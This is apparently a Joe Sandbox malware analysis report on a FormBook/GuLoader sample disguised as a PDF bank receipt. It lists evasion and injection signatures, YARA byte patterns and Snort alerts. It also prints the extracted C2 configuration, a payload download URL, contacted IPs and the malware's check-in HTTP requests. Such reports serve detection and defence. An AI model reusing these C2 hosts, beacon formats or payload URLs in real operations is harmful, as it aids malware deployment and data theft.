Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
E-dekont_pdf.exe

Overview

General Information

Sample Name:E-dekont_pdf.exe
Analysis ID:847920
MD5:774ef0fcf3f7b089b008f54a5fafc6fd
SHA1:bf79dd20705db222b4dfb303529d27f633618014
SHA256:e044ecf0f485711cc6e4e8bbd56819838787b2365893783b3794a969ce2b5aeb
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • E-dekont_pdf.exe (PID: 1568 cmdline: C:\Users\user\Desktop\E-dekont_pdf.exe MD5: 774EF0FCF3F7B089B008F54A5FAFC6FD)
    • E-dekont_pdf.exe (PID: 9712 cmdline: C:\Users\user\Desktop\E-dekont_pdf.exe MD5: 774EF0FCF3F7B089B008F54A5FAFC6FD)
      • explorer.exe (PID: 4604 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • colorcpl.exe (PID: 9852 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
          • cmd.exe (PID: 9880 cmdline: /c del "C:\Users\user\Desktop\E-dekont_pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 9888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crosswalkconsulting.co.uk/mi94/"], "decoy": ["realdigitalmarketing.co.uk", "athle91.com", "zetuinteriors.africa", "jewelry2adore.biz", "sneakersuomo.com", "hotcoa.com", "bestpetfinds.com", "elatedfreedom.com", "louisegoulet.com", "licensescape.com", "jenniferfalconerrealtor.com", "xqan.net", "textare.net", "doctorlinkscsk.link", "bizformspro.com", "ameriealthcaritasfl.com", "hanfengmeiye.com", "anjin98.com", "credit-cards-54889.com", "dinero.news", "naijastudy.africa", "cursosweb22.online", "furniture-61686.com", "furniture-42269.com", "emiu6696.com", "herhustlenation.com", "kevinjasperinc.africa", "hear-aid-92727.com", "goodlifeprojectofficial.com", "freshteak.com", "bellvaniamail.com", "peterslawonline.com", "analogfair.com", "fornettobarbecues.com", "6880365.com", "couragetokingdom.com", "luivix.online", "3ay82.xyz", "tmcgroup.africa", "canadianbreederprogram.com", "funtime28.online", "customcarpentry.uk", "anotherworldrecord.com", "aux100000epices.com", "edelman-production.com", "honorproduct.com", "danuzioneto.com", "iltuosentiero.com", "healthinsurancearena.com", "hunterboots--canada.com", "irestoreart.com", "lapalmaaccesible.com", "khbmfbank.africa", "laxmi.digital", "leqidt.tax", "fluffyjet.online", "chuckclouds.com", "bril-kre-l25.buzz", "centracul.online", "legacyengravers.com", "guesstheword.net", "ded-morozvrn.online", "lemonga.com", "crrgbb.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 20 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:192.168.11.20185.53.179.9049880802031412 04/17/23-09:04:06.968166
      SID:2031412
      Source Port:49880
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20188.114.96.349867802031449 04/17/23-09:00:59.237935
      SID:2031449
      Source Port:49867
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.53.179.9049861802031412 04/17/23-08:59:15.628217
      SID:2031412
      Source Port:49861
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.53.179.9049880802031453 04/17/23-09:04:06.968166
      SID:2031453
      Source Port:49880
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.53.179.9049880802031449 04/17/23-09:04:06.968166
      SID:2031449
      Source Port:49880
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20188.114.96.349867802031453 04/17/23-09:00:59.237935
      SID:2031453
      Source Port:49867
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20188.114.96.349867802031412 04/17/23-09:00:59.237935
      SID:2031412
      Source Port:49867
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.53.179.9049861802031449 04/17/23-08:59:15.628217
      SID:2031449
      Source Port:49861
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.227.38.7449883802031453 04/17/23-09:05:05.047703
      SID:2031453
      Source Port:49883
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.53.179.9049861802031453 04/17/23-08:59:15.628217
      SID:2031453
      Source Port:49861
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.227.38.7449883802031449 04/17/23-09:05:05.047703
      SID:2031449
      Source Port:49883
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.227.38.7449883802031412 04/17/23-09:05:05.047703
      SID:2031412
      Source Port:49883
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2034.138.169.849851802018752 04/17/23-08:57:45.684694
      SID:2018752
      Source Port:49851
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Found malware configuration
      Source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.crosswalkconsulting.co.uk/mi94/"], "decoy": ["realdigitalmarketing.co.uk", "athle91.com", "zetuinteriors.africa", "jewelry2adore.biz", "sneakersuomo.com", "hotcoa.com", "bestpetfinds.com", "elatedfreedom.com", "louisegoulet.com", "licensescape.com", "jenniferfalconerrealtor.com", "xqan.net", "textare.net", "doctorlinkscsk.link", "bizformspro.com", "ameriealthcaritasfl.com", "hanfengmeiye.com", "anjin98.com", "credit-cards-54889.com", "dinero.news", "naijastudy.africa", "cursosweb22.online", "furniture-61686.com", "furniture-42269.com", "emiu6696.com", "herhustlenation.com", "kevinjasperinc.africa", "hear-aid-92727.com", "goodlifeprojectofficial.com", "freshteak.com", "bellvaniamail.com", "peterslawonline.com", "analogfair.com", "fornettobarbecues.com", "6880365.com", "couragetokingdom.com", "luivix.online", "3ay82.xyz", "tmcgroup.africa", "canadianbreederprogram.com", "funtime28.online", "customcarpentry.uk", "anotherworldrecord.com", "aux100000epices.com", "edelman-production.com", "honorproduct.com", "danuzioneto.com", "iltuosentiero.com", "healthinsurancearena.com", "hunterboots--canada.com", "irestoreart.com", "lapalmaaccesible.com", "khbmfbank.africa", "laxmi.digital", "leqidt.tax", "fluffyjet.online", "chuckclouds.com", "bril-kre-l25.buzz", "centracul.online", "legacyengravers.com", "guesstheword.net", "ded-morozvrn.online", "lemonga.com", "crrgbb.com"]}
      Multi AV Scanner detection for submitted file
      Source: E-dekont_pdf.exeVirustotal: Detection: 15%Perma Link
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.77117129709.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.81558929567.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.81556941175.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Antivirus detection for URL or domain
      Source: http://www.hear-aid-92727.com/mi94/?7n-Lh=/g6iPkZMT+AzSmj4EvOYZViGf2+l/NC2EVsOgk6j6s7G3J7D5NbiJXA89lK55coRI4US&7nrLOp=h2JXJDAvira URL Cloud: Label: malware
      Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binAvira URL Cloud: Label: malware
      Multi AV Scanner detection for domain / URL
      Source: www.hear-aid-92727.comVirustotal: Detection: 6%Perma Link
      Source: 5.2.explorer.exe.13f9f840.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 6.2.colorcpl.exe.56ef840.4.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 6.2.colorcpl.exe.34bf7c8.1.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: E-dekont_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VenerisJump to behavior
      Source: E-dekont_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: colorcpl.pdbGCTL source: E-dekont_pdf.exe, 00000004.00000003.77115699467.0000000007180000.00000004.00000020.00020000.00000000.sdmp, E-dekont_pdf.exe, 00000004.00000003.77115133003.000000000716C000.00000004.00000020.00020000.00000000.sdmp, E-dekont_pdf.exe, 00000004.00000002.77117367858.00000000000D0000.00000040.10000000.00040000.00000000.sdmp
      Source: Binary string: colorcpl.pdb source: E-dekont_pdf.exe, 00000004.00000003.77115699467.0000000007180000.00000004.00000020.00020000.00000000.sdmp, E-dekont_pdf.exe, 00000004.00000003.77115133003.000000000716C000.00000004.00000020.00020000.00000000.sdmp, E-dekont_pdf.exe, 00000004.00000002.77117367858.00000000000D0000.00000040.10000000.00040000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: E-dekont_pdf.exe, 00000004.00000001.76878880686.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: E-dekont_pdf.exe, 00000004.00000003.77030284291.00000000372F1000.00000004.00000020.00020000.00000000.sdmp, E-dekont_pdf.exe, 00000004.00000003.77025916649.0000000037147000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: E-dekont_pdf.exe, 00000004.00000003.77030284291.00000000372F1000.00000004.00000020.00020000.00000000.sdmp, E-dekont_pdf.exe, 00000004.00000003.77025916649.0000000037147000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: E-dekont_pdf.exe, 00000004.00000001.76878880686.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ExternalDLL\ROGGamingCenterXMLHelper\obj\x64\Release\ThrottleGearXMLHelper.pdb<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747"><path d="M1.032 1.032V15H15V1.03zm2 2H13V13H3.03z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" overflow="visible"/><path d="M9.536 8.3c-.467-.065-1.046-.105-1.532.275-.403.315-.777.713-1.105 1.017-.328.305-.652.44-.586.44H2.47v1h3.844c.582 0 .9-.368 1.264-.705.364-.337.731-.721 1.043-.965.106-.083.406-.124.779-.072.373.051.707.18 1.102.18.146 0 .215.034.324.126.108.092.23.254.365.448.135.193.28.417.498.62.218.204.546.383.922.383h.86v-1h-.86c-.1 0-.14-.02-.238-.113-.099-.092-.22-.26-.36-.46-.14-.202-.3-.436-.539-.64a1.517 1.517 0 00-.972-.365c-.033 0-.499-.105-.965-.17zM5.454 3.885c-.86 0-1.569.708-1.569 1.569 0 .86.708 1.568 1.569 1.568.86 0 1.568-.708 1.568-1.568 0-.86-.708-1.569-1.568-1.569zm0 1c.32 0 .568.249.568.569a.56.56 0 01-.568.568.561.561 0 01-.569-.568c0-.32.249-.569.569-.569z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" overflow="visible"/></g></svg> source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ExternalDLL\ROGGamingCenterXMLHelper\obj\x64\Release\ThrottleGearXMLHelper.pdb source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D74
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,1_2_0040699E
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.90 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.91 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.117.26.57 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 15.197.142.173 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 66.29.154.110 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 160.121.87.199 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 81.171.22.5 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.211 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 205.178.189.129 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 199.33.123.34 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 164.155.209.181 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 64.246.164.134 80Jump to behavior
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49851 -> 34.138.169.8:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49861 -> 185.53.179.90:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49861 -> 185.53.179.90:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49861 -> 185.53.179.90:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49867 -> 188.114.96.3:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49867 -> 188.114.96.3:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49867 -> 188.114.96.3:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49880 -> 185.53.179.90:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49880 -> 185.53.179.90:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49880 -> 185.53.179.90:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49883 -> 23.227.38.74:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49883 -> 23.227.38.74:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49883 -> 23.227.38.74:80
      Performs DNS queries to domains with low reputation
      Source: DNS query: www.3ay82.xyz
      Source: DNS query: www.3ay82.xyz
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.crosswalkconsulting.co.uk/mi94/
      Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
      Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=0CB5zMamgLSa2Qk9G/m2rdJQK8/LiOrSmHcqlOKoi6nqM+OhtDcAk7yr1mTtKwqhUShE&7nrLOp=h2JXJD HTTP/1.1Host: www.guesstheword.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=o1w78JSdLhQJpd//cz6vuhCEWxwCs3ZFLfqzER3yERbZr4xPYmZ3WvYQtDeAGIhYcEOX&7nrLOp=h2JXJD HTTP/1.1Host: www.canadianbreederprogram.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=c9XLkKzZuO0py6g1xPdswXMX5NoX1FOKmat/CxXpy/HRSPu3IeXDT300PcCDZZ6h5UkV&7nrLOp=h2JXJD HTTP/1.1Host: www.furniture-61686.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=meb8sxPObMePe7P8flKxy+pWoQzvB6XBu5ErzR9pnSFmHwpkKvXtx95I7yIQNvwtHzN0&7nrLOp=h2JXJD HTTP/1.1Host: www.healthinsurancearena.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX&7nrLOp=h2JXJD HTTP/1.1Host: www.anjin98.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=aUhQPVU+b+KmCO5n+t9BjzZYrvo3RulPNqdvt5v9fBahIfZoi9X6HoXk4Ou54UhVLO4i&7nrLOp=h2JXJD HTTP/1.1Host: www.elatedfreedom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=6B2qrP5xTIPXUhljWLKFvclCy31c2DfKa32CVCvYSfVUhLKBGq8rlAeXXt8b11SpmRrr&7nrLOp=h2JXJD HTTP/1.1Host: www.sneakersuomo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=r2OEULnHovTrNfOCpsXB+B/EQ9/SU+ZHOlmwsAm4HEL75U8ltjEZYIavfnqmba7EJm23&7nrLOp=h2JXJD HTTP/1.1Host: www.jenniferfalconerrealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=tEvJTIrtwEr1z3msC1pTUGnOTVGGiUUymk4IsDmqK+5oX++y4YqyxgOU0GtdL5bqNLwd&7nrLOp=h2JXJD HTTP/1.1Host: www.hotcoa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=/g6iPkZMT+AzSmj4EvOYZViGf2+l/NC2EVsOgk6j6s7G3J7D5NbiJXA89lK55coRI4US&7nrLOp=h2JXJD HTTP/1.1Host: www.hear-aid-92727.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7nrLOp=h2JXJD HTTP/1.1Host: www.credit-cards-54889.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=4Tl7mkmR2hfQ9KBizErbd2os7QrtMSS1Xe9D2XLoGouUMWTPUZ0bimWLWeFNR5N6++45&7nrLOp=h2JXJD HTTP/1.1Host: www.lapalmaaccesible.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=CbCIRV58eRNndOWCI78oxDf6x1iSjx/hnwXmuLCBxTq8dPC8gRCwXJA+IeN3UgdkVb2H&7nrLOp=h2JXJD HTTP/1.1Host: www.3ay82.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&7nrLOp=h2JXJD HTTP/1.1Host: www.crosswalkconsulting.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
